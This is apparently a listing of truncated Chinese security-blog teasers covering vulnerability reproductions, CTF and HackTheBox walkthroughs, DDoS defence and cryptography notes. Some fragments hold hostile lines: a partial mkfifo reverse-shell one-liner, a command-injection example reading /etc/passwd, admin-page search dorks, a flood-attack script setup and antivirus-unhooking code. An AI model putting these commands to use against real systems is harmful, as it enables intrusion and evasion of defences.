漏洞描述大华 DSS存在SQL注入漏洞，攻击者 pota/services/itcBuletin 路由发送特殊构造的数据包，利用报错注入获取数据库敏感信息。攻击者除了可以利用 SQL注入漏词获取数据库中的信息例如，管理员后台密码、站点的用户人人信息)之外，甚至在高权限的情况可向服务器中写入木…

SD-WAN：提升连锁零售企业异地组网稳定性

连锁零售企业往往拥有众多分布在不同地区的分支机构和零售店，为保证企业高效运转，各地区之间的网络连接必须稳定可靠。但基于各地网络基础设施的不同和网络延迟、带宽等限制，异地组网往往并不稳定。在这背景下，SD-WAN成为连锁零售…

Packet Tracer - Configure AAA Authentication on Cisco Routers

Packet Tracer - 在思科路由器上配置 AAA 认证地址表目标在R1上配置本地用户账户，并使用本地AAA进行控制台和vty线路的身份验证。从R1控制台和PC-A客户端验证本地AAA身份验证功能。配置基于服务器的AAA身份验证，采用TACACS协议。从PC-B客户端验证基…

现代密码学基础（2）

目录一. 介绍二. 举例：移位密码 （1）密文概率 （2）明文概率三. 举例：多字母的移位密码四. 完美安全五. 举例：双子母的移位密码六. 从密文角度看完美安全七. 完美保密性质一. 介绍…

【复现】Tenda信息泄露漏洞_19

目录一.概述二 .漏洞影响三.漏洞复现 1. 漏洞一： 四.修复建议： 五. 搜索语法： 六.免责声明一.概述 Tenda远端WEB管理是为了在外网（其他网络）可以访问路由器，从而进行管理。电脑可以通过网线连接…

《产业结构调整指导目录（2024年本）》发布，模糊测试首次纳入

近日，第6次委务会议通过了新版的《产业结构调整指导目录（2024年本）》，该目录自2024年2月1日起正式实施。与之前的版本相比，本次目录在行业设置上进行了全面升级，新增了“网络安全”这一重要行业大类&#…

网络安全服务

有效防御Cc、API接口、http、tcp、WEB应用扫描/爬虫、SYN、WAF、DDOS、UDP、入侵、渗透、SQL注入、XXS跨站脚本攻击、远程恶意代码执行、session ion fixation、Webshell攻击、恶意请求，恶意扫描、暴击破解、CSRF等各种攻击。不用迁移数据，服务器用哪里…

文件上传进阶绕过(二)4个技巧和靶场实战

★★免责声明★★ 文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与学习之用，读者将信息做其他用途，由Ta承担全部法律及连带责任，文章作者不承担任何法律及连带责任。 0、环境准备请移步《文件上传靶场实战：upl…

【现代密码学】笔记5--伪随机置换（分组加密）《introduction to modern cryphtography》

【现代密码学】笔记5--伪随机置换（分组加密）《introduction to modern cryphtography》写在最前面5 伪随机排列实践构造（块密码/分组密码） 写在最前面主要在哈工大密码学课程张宇老师课件的基础上学习记录笔记。内容补充&…

2024年信息安全不完全预测

不需要专家预言就能知道，计算机安全将在2024年出现在新闻中，而且可能不是什么好事。但2024年网络犯罪分子将如何试图突破防御并窃取有价值的数据，值得我们看一看安全专家们的看法和预测。不需要专家预言就能知道，计算机安全将在…

HackerGPTWhiteRabbitNeo的使用及体验对比

1. 简介 WhiteRabbitNeo（https://www.whiterabbitneo.com/）是基于Meta的LLaMA 2模型进行特化的网络安全AI模型。通过专门的数据训练，它在理解和生成网络安全相关内容方面具有深入的专业能力，可广泛应用于教育、专业培训和安全研究…

网络/信息安全（黑客）——自学2024

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

关键信息基础设施安全相关材料汇总

文章目录前言一、法律(1)《中华人民共和国国家安全法》(2)《中华人民共和国网络安全法》(3) 《中华人民共和国密码法》(4)《中华人民共和国数据安全法》(5) 《中华人民共和国个人信息保护法》二、行政法规(6)《中华人民共和国保守国家秘密法实施条例》(7) 《关键信息基础设施安…

浅聊雷池社区版（WAF）的tengine

雷池社区版是一个开源的免费Web应用防火墙（WAF），专为保护Web应用免受各种网络攻击而设计。基于强大的Tengine，雷池社区版提供了一系列先进的安全功能，适用于中小企业和个人用户。 Tengine的故事始于2011年，…

高防服务器、高防 IP 和高防 CDN 之间有什么区别？

网络运营人员最头痛的是什么？ 网络攻击无疑名列前茅。一旦企业遭受网络攻击，所面临的损失可能是无法估量的。那么，如何有效地抵御网络攻击呢？ 高防 IP、高防 CDN 和高防服务器是当前主流的防御手段。那何为“高防”呢&#xff1…

HackTheBox - Medium - Linux - Awkward

Awkward Awkward 是一款中等难度的机器，它突出显示了不会导致 RCE 的代码注入漏洞，而是 SSRF、LFI 和任意文件写入/追加漏洞。此外，该框还涉及通过不良的密码做法（例如密码重用）以及以纯文本形式存储密码来绕过身份验…

Linux Capabilities 进阶实战

目录 1. 快速回顾 2. 为可执行文件分配 capabilities 3. 构建半特权环境 4. 容器与 capabilities Linux Capabilities 基础概念与基本使用上一篇学习了LinuxCapabilities的基础知识和基本使用，因为后面需要学习Docker的逃逸，理解Linux Capabilitie…

网络安全中的“三高一弱”和“两高一弱”是什么？

大家在一些网络安全检查中，可能经常会遇到“三高一弱”这个说法。那么，三高一弱指的是什么呢？ 三高：高危漏洞、高危端口、高风险外连一弱：弱口令一共是4个网络安全风险，其中的“高危漏洞、高危端口、弱…

信息技术安全评估准则新版标准的变化

文章目录前言一、GB/T 18336 标准在我国的应用情况（一）以GB/T 18336 标准制定的信息技术产品国家标准（二）GB/T 18336 标准提升了国家关键信息基础设施的整体网络安全保障水平二、新版 GB/T 18336 标准的变化及应用展望三、标准支…

Kali Linux保姆级教程|零基础从入门到精通，看完这一篇就够了!（附工具包）

作为一名从事网络安全的技术人员，不懂Kali Linux的话，连脚本小子都算不上。 Kali Linux预装了数百种享誉盛名的渗透工具，使你可以更轻松地测试、破解以及进行与数字取证相关的任何其他工作。今天给大家分享一套Kali Linux资料合集&#xf…

【欢迎您的到来】这里是开源库get_local_info作者的付费专栏

您好， 我是带剑书生，开源库get_local_info的作者，欢迎您的到来，这里是我的付费专栏，会用更简洁的语言，更通俗的话语，来帮助您更好的学习rust，这里不仅仅讲解Rust在某些应用功能实现上…

自学网络安全（黑客）笔记

前言网络安全，顾名思义，无安全，不网络。现如今，安全行业飞速发展，我们呼吁专业化的就职人员与大学生 ，而你，认为自己有资格当黑客吗？ 本文面向所有信息安全领域的初学者和从业人员…

2024年网络安全合规建设的发展预测

文章目录前言一、网络安全合规运营工作迎来巨大变革的原因二、网络安全合规运营发展变化的预测预测一：网络安全合规运营会成为企业业务发展的驱动因素预测二：企业对网络安全合规运营的投入将继续增加预测三：第三方供应商和服务提供商需要为企业分担更多的网络安全风险预…

DDoS为什么是黑客常用的攻击手段？

DDoS（分布式拒绝服务）攻击是一种常见的网络攻击方式，它可以导致目标服务器无法响应正常请求，甚至瘫痪。这种攻击通常是由黑客组织使用大量计算机进行协同操作，通过模拟大量真实用户访问网站或程序来造成服务器过载、崩…

网络/信息安全（黑客）——2024自学

1.网络安全是什么网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。 2.网络安全市场一、是市场需求量高； 二、则是发展相对成熟…

详解动态网页数据获取以及浏览器数据和网络数据交互流程-Python

前言动态网页是一种在用户浏览时实时生成或变化的网页。与静态网页不同，后者通常是预先编写好的HTML文件，直接由服务器传送给浏览器，内容在服务端生成且固定不变，获取静态数据的文章课查阅博主上一篇文章：详解静态网…

S/MIME电子邮件证书申请指南

近年来，邮件安全问题日益突出，电子邮件成为诈骗、勒索软件攻击的重灾区。恶意邮件的占比屡创新高，邮件泄密事件更是比比皆是。在如此严峻的网络安全形势下，使用S/MIME电子邮件证书进行邮件收发是当今最佳的邮件安全解决方案之一。…

Linux/Traceback

Enumeration nmap 使用nmap初步扫描发现只开放了22和80端口，端口详细扫描情况如下先看看web是什么样子的，打开网站发现有一条留言，显示该站点已经被黑了， 并且留下了后门查看源代码，可以看到下面的注释 <!--So…

医院网络安全建设：三网整体设计和云数据中心架构设计

医院网络安全问题涉及到医院日常管理多个方面，一旦医院信息管理系统在正常运行过程中受到外部恶意攻击，或者出现意外中断等情况，都会造成海量医疗数据信息的丢失。由于医院信息管理系统中存储了大量患者个人信息和治疗方案信息等，…

某邦通信股份有限公司IP网络对讲广播系统挖矿检测脚本

目录 1.漏洞概述 2.影响版本 3.危害等级 4.挖矿程序检测 5.Nuclei自动化检测

开源了，免费使用GPT4（Windows/Linux/Mac 一键启动脚本）

开源了，免费使用GPT4（Windows一键启动脚本） 大家好，我打算每日花1小时来写一篇文章，这一小时包括文章主题思考和实现，连续日更几天，看看能不能被官方推荐。（帮我点点赞哦&#xff5…

服务器被DDOS攻击如何用高防ip去防护？

什么是 DDoS 攻击？分布式拒绝服务（DDoS）攻击是通过大规模互联网流量淹没目标服务器或其周边基础设施，以破坏目标服务器、服务或网络正常流量的恶意行为。DDoS 攻击利用多台受损计算机系统作为攻击流量来源以达到攻击效果。利用的机…

亚马逊、速卖通、虾皮等平台有哪些测评补单方案，哪个比较好用

随着全球电子商务的迅速发展，跨境电商环境的潜力和机遇日益显现。跨境卖家们可以更便捷地将产品销售到全球市场，但同时也面临着更激烈的竞争、更严格的规定和更高的运营成本等挑战。在这个环境中，如何抓住机遇并克服挑战，成为了所…

汽车网络安全--关于UN R155认证的思考

1.UN R155概述 2020年6月25日，联合国颁布了全球首个汽车网络安全强制性法规 -- UN 155，详细规定了关于评估网络安全措施的审核条款、制造商和供应商降低网络安全风险的方法以及实施风险评估的义务等。法规适用于与信息安全相关的M类(4轮及以上载客汽车)、N类(四轮载货汽车)…

Hasura GraphQL Engine 远程命令执行漏洞复现 [附POC]

文章目录 Hasura GraphQL Engine 远程命令执行漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现0x06 修复建议Hasura GraphQL Engine 远程命令执行漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章内的相关技…

2023 年全国网络安全行业职业技能大赛---电子数据取证分析师比赛样题

2023 年全国网络安全行业职业技能大赛--电子数据取证分析师样题 2023 年全国网络安全行业职业技能大赛--电子数据取证分析师样题项目介绍：任务目标：第一部分：电子数据提取与固定（30%）第二部分：电子数据恢复…

想自学黑客（网络安全），一般人我劝你还是算了

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

【sqli靶场】第六关和第七关通关思路

目录前言一、sqli靶场第六关 1.1 判断注入类型 1.2 观察报错 1.3 使用extractvalue函数报错 1.4 爆出数据库中的表名二、sqli靶场第七关 1.1 判断注入类型 1.2 判断数据表中的字段数 1.3 提示 1.4 构造poc爆库名 1.5 构造poc爆表名 1.6 构造poc爆字段名 1.7 构造poc获取账…

发送java字节码的数据包

一些Java反序列化漏洞在利用时，要发送Java序列化值（字节码）到服务器。我们在使用一些工具生成字节码后，可以通过python或者burp发送。生成的字节码一般以两种形式存储： 1、二进制形式存储到 poc.ser 2、将字节码…

SWPU NSS新生赛

😋大家好，我是YAy_17，是一枚爱好网安的小白，正在自学ing。本人水平有限，欢迎各位大佬指点，一起学习💗，一起进步⭐️。 ⭐️此后如竟没有炬火，我便是唯一的光。⭐️ 最近…

DC-2靶场

DC-2 下载地址：DC and Five86 Series Challenges - Downloads编辑https://www.five86.com/downloads.html DC-2环境配置：解压后在vm虚拟机点击左上方文件-->打开-->选择解压后的DC-2。把kali和DC-2的网路适配器都改成NAT模式 flag1 首先进行主…

想自学黑客（网络安全），我劝你还是算了！

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

[SWPUCTF 2021 新生赛]finalrce

[SWPUCTF 2021 新生赛]finalrce wp 注：本文参考了 NSSCTF Leaderchen 师傅的题解，并修补了其中些许不足。此外，参考了命令执行(RCE)面对各种过滤，骚姿势绕过总结题目代码： <?php highlight_file(__FILE__); …

Crypto基础之密码学

FLAG：20岁的年纪不该困在爱与不爱里，对吗专研方向: 密码学，Crypto 每日emo：今年你失去了什么？ Crypto基础之密码学前言一、编码Base编码base64：Base32 和 Base16：uuencode：xxencod…

艾科思应用接入系统任意文件读取漏洞复现 [附POC]

文章目录艾科思应用接入系统任意文件读取漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现0x06 修复建议艾科思应用接入系统任意文件读取漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章内的相关技术从事非…

ChatGPT 也宕机了？如何预防 DDOS 攻击的发生

最近，开发人工智能聊天机器人的公司 OpenAI 遭受了一次规模较大的分布式拒绝服务（DDoS）攻击，导致其旗下的 ChatGPT 服务在短短 12 小时内遭遇了 4 次断网，众多用户遭受了连接失败的问题。这次攻击事件引起了广泛的关…

IT 人员与加密程序：如何战胜病毒

🔐 加密程序是攻击者在成功攻击组织时使用最多的恶意软件类型。它们通常会发送到一个庞大的电子邮件地址数据库，看起来像 Word 或 Excel 文档或 PDF 文件。想象一下，你是会计部门的一名员工。这种格式的文件在电子文档管理系统中被广泛使用…

NYX靶场

信息收集 # Nmap 7.94 scan initiated Fri Nov 24 21:59:30 2023 as: nmap -sn -oN live.nmap 192.168.182.0/24 Nmap scan report for 192.168.182.1 (192.168.182.1) Host is up (0.00044s latency). MAC Address: 00:50:56:C0:00:08 (VMware) Nmap scan report for 192.168…

i春秋云镜之Initial

首先拿到目标IP：39.99.156.72 通过Fscan进行扫描发现存在Thinkphp RCE漏洞。 ./fscan_amd64 -h 39.99.156.72然后通过利用工具进行RCE。我们进行getshell之后通过蚁剑进行连接。反弹shell并转换成python 交互式shell。 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/b…

【漏洞复现】 Milesight Router httpd.log 信息泄漏(CVE-2023-4714)

漏洞描述 Milesight Router 存在信息泄漏漏洞，攻击者通过访问httpd.log可以获取登陆敏感日志信息。免责声明技术文章仅供参考，任何个人和组织使用网络应当遵守宪法法律，遵守公共秩序，尊重社会公德，不得利用网络从…

发现隐藏的 Web 应用程序漏洞

随着 Web 2.0 的扩展，近年来社交媒体平台、电子商务网站和电子邮件客户端充斥着互联网空间，Web 应用程序已变得无处不在。国际知名网络安全专家、东方联盟创始人郭盛华透露：‘应用程序消耗和存储更加敏感和全面的数据，它们成为对…

[GXYCTF2019]Ping Ping Ping （文件执行漏洞）

本题考点： 1、命令联合执行 2、命令绕过空格方法 3、变量拼接 1、命令联合执行 ; 前面的执行完执行后面的| 管道符，上一条命令的输出，作为下一条命令的参数（显示后面的执行结果）|| 当前面的执行出错时（为…

Redis 未授权利用

Redis 未授权要点 redis 和 ssrf 经常绑定 redis 端口 6379 redis 在内网常见由于服务安装启动的时候默认不需要账户名密码认证，并且默认可以直接向服务器写入文件，也不需要进行额外的配置，这种情况下会造成任意文件的写入，…

社会工程学简单的知识

什么是社会工程学从原理上来说，社会工程学是通过分析攻击对象的心理弱点、利用人类的本能反应以及人的好奇、贪婪等心理特征进行的，使用诸如假冒、欺骗、引诱等多种手段来达成攻击目标的一种攻击手段。其实，社会工程学攻击蕴涵了各式各样的…

如何仅用百度、谷歌成为黑客

文章目录一、搜索这些总结一、搜索这些 site:starbucks.com inurl:adminintitle:"webcamxp 5" site:google.comfiletype:dpf用这些关键字来搜索, 自行组合总结

pycdc配置和使用

配置使用的kali2023版本安装cmake pip install cmake 下载pycdc git clone https://github.com/zrax/pycdc 切换到pycdc目录 cd pycdc 进行cmake cmake CMakeLists.txt make 使用显示帮助信息 ./pycdc -h 显示帮助信息反编译 ./pycdc /home/kali/Desktop/main…

【漏洞复现】捷诚管理信息系统 SQL注入漏洞

漏洞描述捷诚管理信息系统是一款功能全面，可以支持自营、联营到外柜租赁的管理，其自身带工作流管理工具，能够帮助企业有效的开展内部审批工作。该系统CWSFinanceCommon.asmx接口存在SQL注入漏洞。未经身份认证的攻击者可以通过该漏洞获取数据库敏感信息，深入利用可获取…

【漏洞复现】CVE-2023-47261 Dokmee ECM信息泄露致远程命令执行

漏洞描述 Dokmee ECM是一款国外企业内容管理 (ECM) 软件。每个公司的办公室每个角落都存放着文档、记录和档案。Dokmee 一系列解决方案可以帮助您高效地组织、保护和管理这些文件。支持的文件：PDF、TIFF、Word、Excel、Auto-CAD 绘图、电子邮件等。Dokmee 可以帮助您立即实现…

网络安全—溯源分析

溯源分析攻击机溯源技术基于日志的溯源使用路由器、主机等设备记录网络传输的数据流中的关键信息(时间、源地址、目的地址)，追踪时基于日志查询做反向追踪。这种方式的优点在于兼容性强、支持事后追溯、网络开销较小。但是同时该方法也受性能、空间和隐私保护…

【计算机网络】—— 详解码元，传输速率的计算|网络奇缘系列|计算机网络

🌈个人主页: Aileen_0v0🔥系列专栏: 一见倾心,再见倾城 --- 计算机网络~💫个人格言:"没有罗马,那就自己创造罗马~" 目录码元速率和波特思考1 思考2 思考3 带宽（Bandwidth） 📝总结码元…

面向未来的数据安全策略

人工智能（AI）已经成为一项突破性技术，可以彻底改变各个领域，并引发就业市场的强烈焦虑。毫不奇怪，它对技术和运营的变革性影响为提高效率、准确性和决策提供了巨大的可能性。它还为黑客提供了巨大的机会。网络犯罪分…

DC-4靶场

目录 nmap进行主机发现尝试反弹shell： 进入交互式shell： Hydra爆破jim用户密码： ssh登录charles ： 提权（三种方法）： exim4提权…

数据脱敏和数据加密，它们有什么不同？

PrimiHub一款由密码学专家团队打造的开源隐私计算平台，专注于分享数据安全、密码学、联邦学习、同态加密等隐私计算领域的技术和内容。无论是静态数据存储、数据使用，还是数据传输，任何时候保护数据的安全都是至关重要的，本文将介…

大华 DSS 登录接口Struct2-045漏洞复现 [附POC]

文章目录大华 DSS 登录接口Struct2-045漏洞复现 [附POC]0x01 前言0x02 漏洞描述0x03 影响版本0x04 漏洞环境0x05 漏洞复现1.访问漏洞环境2.构造POC3.复现大华 DSS 登录接口Struct2-045漏洞复现 [附POC] 0x01 前言免责声明：请勿利用文章内的相关技术从事非法测试，由于传播…

BUUCTF-Linux Labs

Linux Labs 根据题目给出的内容，在kali中连接靶机，输入密码进入命令行模式 ls发现什么都没有，有可能进入到了一个空文件夹 cd .. 切换到上一层目录，ls查看此目录下的内容，发现flag.txt文件，查看文件是flag …

HackTheBox - Medium - Linux - Jupiter

Jupiter Jupiter 是一台中等难度的 Linux 机器，它有一个使用 PostgreSQL 数据库的 Grafana 实例，该数据库在权限上过度扩展，容易受到 SQL 注入的影响，因此容易受到远程代码执行的影响。一旦站稳脚跟，就会注意到一个名…

红队打靶练习:DIGITALWORLD.LOCAL: MERCY V2

目录信息收集 1、arp 2、netdiscover 3、nmap 4、nikto 5、whatweb 6、总结目录探测 1、gobuster 2、dirsearch WEB enum4linux枚举工具 smbclient工具 knock工具 CMS 文件包含漏洞 Tomcat 提权系统信息收集本地提权 get root 信息收集 1、arp ┌──…

什么是Web 应用程序渗透测试？

Web 应用程序渗透测试，也称为 Web 渗透测试或简称 Web 应用程序渗透测试，是一种涉及评估 Web 应用程序和网站安全性的网络安全实践。这是一种主动识别恶意攻击者可能利用的漏洞和弱点的方法。 – Web 应用程序安全评估 Web 渗透测试的目标是模拟对 Web…

JBoss 5.x/6.x 反序列化 CVE-2017-12149 已亲自复现

JBoss 5.x/6.x 反序列化 CVE-2017-12149 已亲自复现漏洞名称漏洞描述影响版本漏洞复现环境搭建漏洞利用修复建议总结漏洞名称漏洞描述 2017年8月30日，厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的…

Web 安全之文件下载漏洞详解

目录引言文件下载漏洞原理文件下载漏洞的危害文件下载漏洞类型文件下载漏洞的利用方法文件下载漏洞示例文件下载漏洞的防护措施漏洞检测与测试小结引言在数字化时代，文件下载是网络应用程序的重要的功能之一，用户可以通过这一功能获…

ThunderSearch(闪电搜索器)_网络空间搜索引擎工具_信息收集

文章目录 ThunderSearch简介1 项目地址2 使用方式2.1 配置文件config.json说明2.2 构建和运行 3 使用式例 ThunderSearch简介 ThunderSearch（闪电搜索器）是一款使用多个(【支持Fofa、Shodan、Hunter、Zoomeye、360Quake网络空间搜索引擎】网络空间搜索引…

R3 HOOK 卸载

卸载R3 WINAPI HOOK 代码说明很多常见的杀软会挂钩R3 WINAPI来实现行为拦截等操作下列代码是遍历当前进程所有模块, 如果是位于System32下的模块则进行PE解析text代码段对可能Hook的模块进行reload操作， 实现卸载杀软R3 HOOK操作。#include <windows.h> #…

大师计划1.0 - log2 CRTO笔记

CRTOⅠ笔记 log2 这个笔记是我在2023年11月23日-12月22日中，学习CRTO所做的一些笔记。事实上TryHackMe的路径和htb学院包含了许多CRTO的知识并且甚至还超出了CRTO（CS除外），所以很多东西在THM和htb学院学过，这次CRTO等…

2023楚慧杯 WEB方向部分:(

1、eaaeval 查看源码能看见账号：username169，密码：password196提交这个用户密码可以跳转到页面/dhwiaoubfeuobgeobg.php 通过dirsearch目录爆破可以得到www.zip <?php class Flag{public $a;public $b;public function __construct(){…

【网络安全】-Linux操作系统—CentOS安装、配置

文章目录准备工作下载CentOS创建启动盘确保硬件兼容安装CentOS启动安装程序分区硬盘网络和主机名设置开始安装完成安装初次登录和配置更新系统安装额外的软件仓库安装网络工具配置防火墙设置SELinux安装文本编辑器配置SSH服务总结 CentOS是一个基于Red Hat Enterprise Linu…

cc攻击之随机参数脚本

环境： yum install wget -y wget https://nodejs.org/download/release/v15.14.0/node-v15.14.0-linux-x64.tar.xz tar xf node-v15.14.0-linux-x64.tar.xz cd node-v15.14.0-linux-x64/ ln -s ~/node-v15.14.0-linux-x64/bin/node /usr/bin/node ln -s ~/node-…

网络安全人士必备的30个安全工具

1.Wireshark Wireshark（前称Ethereal）是一个网络封包分析软件。网络封包分析软件的功能是截取网络封包，并尽可能显示出最为详细的网络封包资料。Wireshark使用WinPCAP作为接口，直接与网卡进行数据报文交换。 2.Metasploit Meta…

社交网络分析4（下）：社交网络链路预测分析、LightGBM框架、LLSLP方法（LightGBM 堆叠链路预测）、堆叠泛化、社交网络链路预测分析的挑战

社交网络分析4 写在最前面LightGBMLightGBM简介GBDT的核心概念和应用LightGBM的特点LightGBM与GBDT的比较 LightGBM的原理与技术GBDT的传统算法LightGBM的创新算法 GOSS（Gradient-based One-Side Sampling）算法解析概念和工作原理算法的逻辑基础GOSS算法…

linux命令绕过

WAF绕过命令执行 1 命令分隔符2 命令执行绕过2.1 绕过空格2.2 拼接2.3 编码2.4 单引号、双引号绕过2.5 反斜线绕过2.6 通配符绕过 1 命令分隔符 linux： && || & | ; # &&绕过 [rootlocalhost ~]# echo 123&& cat /etc/passwd 123 root:…

CTF命令执行部分总结

😋大家好，我是YAy_17，是一枚爱好网安的小白，正在自学ing。本人水平有限，欢迎各位大佬指点，一起学习💗，一起进步⭐️。 ⭐️此后如竟没有炬火，我便是唯一的光。⭐️ 关于…

连续登榜 | 赛宁网安入选《2023中国网络安全产业势能榜》

12月25日，嘶吼安全产业研究院正式发布《2023中国网络安全产业势能榜》，赛宁网安凭借在网络安全领域的技术优势、产品创新能力和多年积累的企业综合实力，在300多家安全厂商中脱颖而出，再度被评为政府行业和能源行业“专精型”安全厂…

服务器解析漏洞是什么？攻击检测及修复

服务器解析漏洞（Server-side Include Vulnerability，SSI漏洞）是一种安全漏洞，通常出现在支持服务器端包含（SSI）功能的Web服务器上。SSI是一种在Web页面中嵌入动态内容的技术，允许开发人员将外部…

智能化创作与艺术：发展、问题、未来趋势

导言随着人工智能技术的不断进步，智能化创作在艺术领域逐渐崭露头角。本文将深入研究智能化创作与艺术的发展过程、遇到的问题、解决的过程，探讨未来的可用范围，并分析在各国的应用和未来的研究趋势。最后，探讨在哪些方面能取胜&…

青少年CTF-qsnctf-Web-Queen

题目环境： 题目难度：★★ 题目描述：Q的系统会不会有漏洞？ 看到了登录窗口，使用burp suite工具进行抓包 burp suite抓包 admin 1 Repeater重放Send放包 Your IP is not the administrator’s IP address! 您的IP不是管理…

【网络技术】BGP 基础与概述

该笔记主要作用与 BGP 路由协议的基础和概述讲解，其萌芽作用参考视频：红茶三杯关键词阐述：AS 独立自治网络系统机构前置知识在我们学习 BGP 路由之前所学习的所有动态路由策略，都同属一个路由类中：IGP BGP 路由协…

w13渗透测试实战之https账号密码捕抓

此次实验需要配合arp欺骗,不知道arp欺骗的，可以查看这篇w13渗透测试实战之ARP欺骗攻击（ARP断网攻击） 一、实验环境攻击机：linux Kali 靶机：window 7 网络环境：虚拟机NAT 网关：192.168.89.2实…

Vmware虚拟机网络问题排查大全

在windows系统vmware workstation pro软件安装的虚拟机频发无法上网的问题，如何一步一步标准排查？ # 确定问题无法上网归根结底就三个原因： 网络连接错误、IP地址错误、DNS错误，下列截图均为正常上网情况，如果不能上…

网站显示不安全警告怎么办？消除网站不安全警告超全指南

网站显示不安全警告怎么办？当用户访问你的网站，而您的网站没有部署SSL证书实现HTTPS加密时，网站就会显示不安全警告，这种警告，不仅有可能阻止用户继续浏览网站，影响网站声誉，还有可能影响网站在…

想学黑客技术（网络安全），我劝你还是算了吧

前言一、什么是网络安全网络安全可以基于攻击和防御视角来分类，我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术，而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域，都有攻与防…

shiro反序列化与fastjson反序列化漏洞原理

01 shiro反序列化漏洞的原理 Shiro反序列化漏洞的原理是攻击者通过精心构造恶意序列化数据，使得在反序列化过程中能够执行任意代码。Shiro是一个Java安全框架，提供了身份验证、授权、加密和会话管理等功能。其中，Shiro的序列化功能可以将对象…

计算机网络——应用层与网络安全（六）

前言： 前几章我们已经对TCP/IP协议的下四层已经有了一个简单的认识与了解，下面让我们对它的最顶层，应用层进行一个简单的学习与认识，由于计算机网络多样的连接形式、不均匀的终端分布，以及网络的开放性和互联性等特征&…

Apache Shiro ＜= 1.2.4反序列化漏洞攻击 CVE-2016-4437 已亲自复现

Apache Shiro < 1.2.4反序列化漏洞攻击 CVE-2016-4437 已亲自复现漏洞名称漏洞描述影响版本漏洞复现环境搭建漏洞利用修复建议总结漏洞名称漏洞描述在 1.2.5 之前的 Apache Shiro 中，当未为“记住我”功能配置密钥时，远程攻击者可以通过未指定…

EyouCMSv1.5.1漏洞复现

赞赞网络科技 EyouCMS（易优CMS）是中国赞赞网络科技公司的一套基于ThinkPHP的开源内容管理系统（CMS）。 Eyoucms v1.5.1 及以前版本存在任意用户后台登陆与文件包含漏洞，该漏洞使攻击者可以通过调用api，在前台…

苹果iPhone黑客攻击警告！引发印度政治风暴

2023年10月苹果向一些印度反对派政客和记者发送通知，警告他们的iPhone可能成为国家支持的攻击者的目标。这引发印度政府强烈反应，指责苹果干涉该国内政，并质疑其警告的准确性。现在，据《华盛顿邮报》报道 ，印度官员…

红队打靶练习:MISDIRECTION: 1

信息收集 1、arp ┌──(root㉿ru)-[~/kali] └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.12.128 Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan) 192.168.12.1 00:50:56:c0:00:08 …

2024年网络安全竞赛-页面信息发现任务解析

页面信息发现任务说明：服务器场景：win20230305（关闭链接）在渗透机中对服务器信息收集，将获取到的服务器网站端口作为Flag值提交；访问服务器网站页面，找到主页面中的Flag值信息，将Flag值提交；访问服务器网站页面，找到主页面中的脚本信息，并将Flag值提交；访问服务器…

OSPF ROUTER-ID-新版（15）

目录整体拓扑操作步骤 1.INT 验证Router-ID选举规则 1.1 查看路由器Router-ID 1.2 配置R1地址 1.3 查看R1接口信息 1.4 查看R1Router-ID 1.5 删除接口IP并查看Router-ID 1.6 手工配置Router-ID 2.基本配置 2.1 配置R1的IP 2.2 配置R2的IP 2.3 配置R3的IP 2.4 配…

dvwa问题篇 -- 菜刀蚁剑连接不上图片木马 -- 小黑解决教程

各位小伙伴初次玩dvwa会出现各种问题，本来想把一些问题直接总结写一篇dvwa文章来着，但因为都是关键字搜索，所以将一些问题都拆分出来，以便大家方便查类似问题。（大家有遇到不一样的问题欢迎投稿！&#xff0…

HackTheBox - Medium - Linux - Interface

Interface Interface 是一种中等难度的 Linux 机器，具有“DomPDF”API 端点，该端点通过将“CSS”注入处理后的数据而容易受到远程命令执行的影响。“DomPDF”可以被诱骗在其字体缓存中存储带有“PHP”文件扩展名的恶意字体，然后可以通过从其…

中国蚁剑的安装以及简单的使用方法

中国蚁剑的安装正确使用蚁剑第一次打开这个进行初始化点击初始化，选择第二个文件目录则会显示初始化成功，重启后会鼠标右键点击添加数据出现这个弹窗输入url和连接密码即可这里输入的连接密码时6是因为在写入redis.cmd时，REQUEST[6]…

网络基础操作练习

知识改变命运，技术就是要分享，有问题随时联系，免费答疑，欢迎联系！ 手把手教你操作华为设备，新手必看。实验拓扑图关于命令行视图 1）用户视图 <Huawei> 2）系统视图 [Hu…

PHP序列化总结1--序列化和反序列化的基础知识

序列化和反序列化的作用 1.序列化：将对象转化成数组或者字符串的形式 2.反序列化：将数组或字符串的形式转化为对象为什么要进行序列化这种数据形式中间会有很多空格，不同人有不同的书写情况，可能还会出现换行的情况为此为了…

劫持 PE 文件：新建节表并插入指定 DLL 文件

PE格式简介 PE(Portable Executable)格式，是微软Win32环境可移植可执行文件(如exe、dll、vxd、sys和vdm等)的标准文件格式。PE格式衍生于早期建立在VAX(R)VMS(R)上的COFF(Common Object File Format)文件格式。 Portable 是指对于不同的Windows版本和不同的CPU类型上…

学习华为企业无线网络，有这篇文章就够了。

